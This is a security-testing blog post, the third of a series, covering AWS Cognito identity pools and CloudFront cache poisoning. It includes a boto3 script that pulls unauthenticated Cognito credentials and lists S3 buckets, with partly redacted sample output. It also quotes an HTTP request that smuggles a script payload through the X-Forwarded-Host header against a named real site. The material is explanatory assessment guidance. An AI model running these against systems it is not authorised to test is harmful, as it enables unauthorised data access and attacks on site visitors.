Friday, February 14, 2020

A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)

This is the last part of our 3 posts journey discussing the main Amazon Web Services and their security.

In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: Part 1 and Part 2.

In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: AWS Cognito and AWS CloudFront.
These are two very different services related to supporting web applications in two specific areas:

  • AWS Cognito aims at providing an access control system that developers can implement in their web applications. 
  • AWS CloudFront is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.


AWS Cognito



It provides developers with an authentication, authorization and user management system that can be implemented in web applications and is divided in two components:

  • user pools;
  • identity pools. 
Quoting AWS documentation on Cognito:
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.
From a security perspective, we are particularly interested in identity pools as they provide access to other AWS services we might be able to mess with.

Identity pools are identified by an ID that looks like this:
 us-east-1:1a1a1a1a-ffff-1111-9999-12345678

A web application will then query AWS Cognito by specifying the proper Identity pool ID in order to get temporary limited-privileged AWS credentials to access other AWS services.

An identity pool also allows to specify a role for users that are not authenticated.
Amazon documentation states:
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.




This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.

In fact, let's consider the following scenario of a web application that allows access to AWS S3 buckets upon proper authentication with the identity pool that provides temporary access to the bucket.

Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privileges of accessing AWS S3 buckets.

In such a situation, an attacker will be able to access the application credentials to AWS.

The following python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.

In the following script, just replace IDENTITY_POOL with the Identity Pool ID identified during the assessment. 


# NB: This script requires boto3.
# Install it with:
# sudo pip install boto3
import boto3
from botocore.exceptions import ClientError

try:
   # Get access token
   client = boto3.client('cognito-identity', region_name="us-east-2")
   resp =  client.get_id(IdentityPoolId=[IDENTITY_POOL])

   print "\nIdentity ID: %s"%(resp['IdentityId'])
   print "\nRequest ID: %s"%(resp['ResponseMetadata']['RequestId'])
   resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
   secretKey = resp['Credentials']['SecretKey']
   accessKey = resp['Credentials']['AccessKeyId']
   sessionToken = resp['Credentials']['SessionToken']
   print "\nSecretKey: %s"%(secretKey)
   print "\nAccessKey ID: %s"%(accessKey)
   print "\nSessionToken %s"%(sessionToken)

   # Get all buckets names
   s3 = boto3.resource('s3',aws_access_key_id=accessKey, aws_secret_access_key=secretKey, aws_session_token=sessionToken, region_name="eu-west-1")
    print "\nBuckets:"
   for b in s3.buckets.all():
       print b.name

except (ClientError, KeyError):
   print "No Unauth"
   exit(0)




If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:


Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944

Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793

SecretKey: wJE/[REDACTED]Kru76jp4i

AccessKey ID: ASI[REDACTED]MAO3

SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF

Buckets:
mindeds3log
mindeds3test01



AWS CloudFront

AWS CloudFront is Amazon's answer to a Content Delivery Network service which purpose is to improving the performances of delivering content from web applications.
The following images depict the basics of how CloudFront work.



The browser requests resource X from the edge location.
If the edge location has a cached copy of resource X it simply sends it back to the browser.

The following picture describes what happens if resource X is not cached in the edge location.





  • The browser requests resource X to the edge location which doesn't have a cached version. 
  • The edge location thus requests resource X to its origin, meaning where the original copy of resource X is stored. (This is decided upon configuring CloudFront for a given domain. )
  • The origin location can be, for example, an Amazon service such as an S3 bucket, or a different server not being part of Amazon. 
  • The edge location receives resource X and stores it in its cache for future use and finally sends it back to the browser. 

This simple caching mechanism can be very helpful when it comes to improve the performances of querying a web application but it might also hide some unwanted behavior.

As recently shown by James Kettle, web applications relying on cache for dynamic pages should be aware of the possibility to abuse such caching functionality and deliver malicious content to the users a.k.a. cache poisoning.
Briefly, as described by Kettle in his post, web cache systems need a way to uniquely identify a request in order to not keep contacting the origin location.
To do so, few parts of an HTTP request are considered to fully identify the request and are called cache keys. Whenever a cache key changes, the caching system will consider it as a different request and, if it doesn't have a cached copy of it, will contact the origin location.
The basic idea behind web applications cache poisoning is to find an HTTP parameter that is not a cache key and that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to cache a request containing a malicious payload for that parameter and, whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.

Let's consider the following simple request taken from James' post:


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />



The value for X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By changing canary with a."><script>alert(1)</script> it's possible to mess with the HTML and generate an alert box.


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>



HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>/cms/social.png" />

However, in this case, X-Forwarded-Host is not used as a cache key. This means that it is possible to cache the request containing the alert code in the web cache so that it will be served to other users in the future. As it becomes clear from James' post, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute in the set of cache keys and are valuable candidates to perform cache poisoning attacks. James has also developed a Burp plug-in called param-miner that can be used to identify HTTP parameters that are not used as cached keys.

Conclusion

This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.
It is undeniable that AWS provides a comprehensive solution that companies take advantage of instead of having to take care of the entire infrastructure by themselves. However, companies are the ones in charge of managing the configurations of the services they decide to use. It thus becomes crucial to test and verify such configurations.

No comments:

Post a Comment